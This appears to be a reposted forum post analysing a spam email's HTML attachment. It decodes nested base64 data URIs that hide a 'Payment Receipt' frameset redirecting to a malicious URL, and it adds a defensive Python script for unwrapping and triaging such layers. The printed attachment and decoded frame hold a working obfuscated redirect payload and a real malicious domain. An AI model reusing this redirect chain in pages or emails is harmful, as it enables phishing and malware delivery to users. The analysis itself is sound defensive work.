Code injection in http

(As seen on Symantec Connect. Created: 22 Sep 2014)

Hi all! It's been a while since I was here (a little over 2 years). A lot has changed. Anyway, let's get to it.

How Code injection is used
I've received 2 spam mails on my Yahoo account, which, by the way, scans any attachments using Norton. There is an http attachment which I wouldn't recommend you click on to open in a new browser tab or window. The attachment looks like this:

<html>
<title> </title>
<meta http-equiv="refresh" content="0;data:text/html;base64,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">
</html>
 
That long line there is a meta tag. The <meta> tag provides metadata about the HTML document. Metadata is not displayed on the page, but it is machine parsable. Meta elements are typically used to specify the page description, keywords, the author of the document, the last-modified date, and other metadata. The metadata can be used by browsers (how to display content or reload the page), search engines (keywords), or other web services. Here the http-equiv="refresh" directive with a delay of 0 tells the browser to navigate immediately, and the target is not an ordinary URL but a data: URI carrying an entire second HTML document in base64.
You can decode the text with a local tool or an online decoder. Base64 is an encoding, not encryption, so no key is needed. Decoding the meta tag's content value gives this:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Payment Receipt</title>
<frameset>
<frame src=data:text/html;base64,PD8/PlpodG1sPjxoZWFkPjxNRVRBIEhUVFAtRVFVSVY9IlJlZnJlc2giIENPTlRFTlQ9IjA7VVJMPWh0dHA6Ly90aG9uZ3RhY2Nvbmc2Mi5jb20vd3AtaW5jbHVkZXMvaW5keGUucGhwIj48L2hlYWQ+PHA+PHA+DQo8L2hlYWQ+PC9ib2R5PjwvaHRtbD4=></frame>
<noframes> was not found!</title>
<script language="JavaScript" type="text/javascript">
function winopen(url, name) {
  window.open(url, name, 'scrollbars=1,resizable=no,width=500,height=250,status=0,menubar=0');
}
</script>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
//-->
</script>
</body>
</html>
 
This shows the title used in the email, and you'll also notice it carries JavaScript helpers (winopen, MM_openBrWindow) for opening a new window linking to another site. The frame's src is another base64 data URI, and decoding it gives us the clue:

<??>Zhtml><head><META HTTP-EQUIV="Refresh" CONTENT="0;URL=http://thongtaccong62.com/wp-includes/indxe.php"></head><p><p>
</head></body></html>
 
And that's where the malware redirects us.
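As an added example (not part of the original post), the following Python script automates the two-stage unwrap done by hand above: it follows every base64 data:text/html URI it finds, decodes each layer, and reports meta-refresh targets that point at an external http(s) URL, which is what an analyst triaging such an attachment wants to know. The sample attachment it runs on is constructed here, with example.invalid standing in for the real redirect domain; the function names unwrap, refresh_targets and triage are my own, and the regex-based approach is chosen because the attacker's HTML is malformed and a strict parser may not surface the frame at all.

```python
from __future__ import annotations

import base64
import re

# A base64 data: URI carrying an HTML document. Base64 never contains quotes,
# '>' or whitespace, so the character class also terminates the match
# correctly inside an unquoted attribute such as <frame src=data:...>.
DATA_URI_RE = re.compile(r"data:text/html;base64,([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Any <meta ...> tag; attacker HTML is often malformed, so a forgiving regex
# beats a strict parser here.
META_TAG_RE = re.compile(r"<meta\b[^>]*>", re.IGNORECASE)
REFRESH_ATTR_RE = re.compile(r"http-equiv\s*=\s*[\"']?\s*refresh", re.IGNORECASE)
# content="0;URL=http://..."  or  content="0;data:text/html;base64,..."
CONTENT_TARGET_RE = re.compile(
    r"content\s*=\s*[\"']?\s*\d+\s*;\s*(?:url\s*=\s*)?([^\"'>\s]+)", re.IGNORECASE)


def unwrap(html: str, max_depth: int = 5) -> list:
    """Follow every base64 data:text/html URI in the document, recursively.

    Returns [(depth, html), ...] with the original document at depth 0.
    max_depth bounds the recursion so a self-referencing payload cannot loop.
    """
    layers = [(0, html)]
    frontier = [html]
    depth = 0
    while frontier and depth < max_depth:
        depth += 1
        next_frontier = []
        for doc in frontier:
            for match in DATA_URI_RE.finditer(doc):
                try:
                    decoded = base64.b64decode(match.group(1)).decode("utf-8", "replace")
                except ValueError:  # binascii.Error is a ValueError subclass
                    continue
                layers.append((depth, decoded))
                next_frontier.append(decoded)
        frontier = next_frontier
    return layers


def refresh_targets(html: str) -> list:
    """Collect http(s) meta-refresh targets from the document and every decoded layer."""
    targets = []
    for _, doc in unwrap(html):
        for tag in META_TAG_RE.findall(doc):
            if not REFRESH_ATTR_RE.search(tag):
                continue
            match = CONTENT_TARGET_RE.search(tag)
            if match and match.group(1).lower().startswith(("http://", "https://")):
                targets.append(match.group(1))
    return targets


def triage(html: str) -> dict:
    """Summarise what an analyst wants to know about an HTML attachment."""
    layers = unwrap(html)
    return {
        "data_uri_layers": len(layers) - 1,
        "refresh_targets": refresh_targets(html),
        # A mail attachment has no legitimate reason to hide a whole document
        # inside a base64 data: URI; one such layer is enough to flag the file.
        "suspicious": len(layers) > 1,
    }


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


# Constructed three-layer sample mirroring the attachment discussed above;
# example.invalid is a placeholder for the real redirect domain.
INNER_HTML = ('<html><head><META HTTP-EQUIV="Refresh" '
              'CONTENT="0;URL=http://example.invalid/wp-includes/landing.php"></head></html>')
MIDDLE_HTML = ('<html><head><title>Payment Receipt</title></head><frameset>'
               '<frame src=data:text/html;base64,' + _b64(INNER_HTML) + '></frame></frameset></html>')
SAMPLE_ATTACHMENT = ('<html><title> </title><meta http-equiv="refresh" '
                     'content="0;data:text/html;base64,' + _b64(MIDDLE_HTML) + '"></html>')

if __name__ == "__main__":
    for depth, doc in unwrap(SAMPLE_ATTACHMENT):
        print(f"--- layer {depth} ({len(doc)} chars) ---")
        print(doc[:120])
    print(triage(SAMPLE_ATTACHMENT))
```

Running it prints the three layers (the attachment, the "Payment Receipt" frameset, and the inner refresh page) followed by the triage summary, whose refresh_targets list holds the final redirect URL. The max_depth bound matters in practice: a payload that embeds a data: URI pointing at itself would otherwise keep the decoder busy forever.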
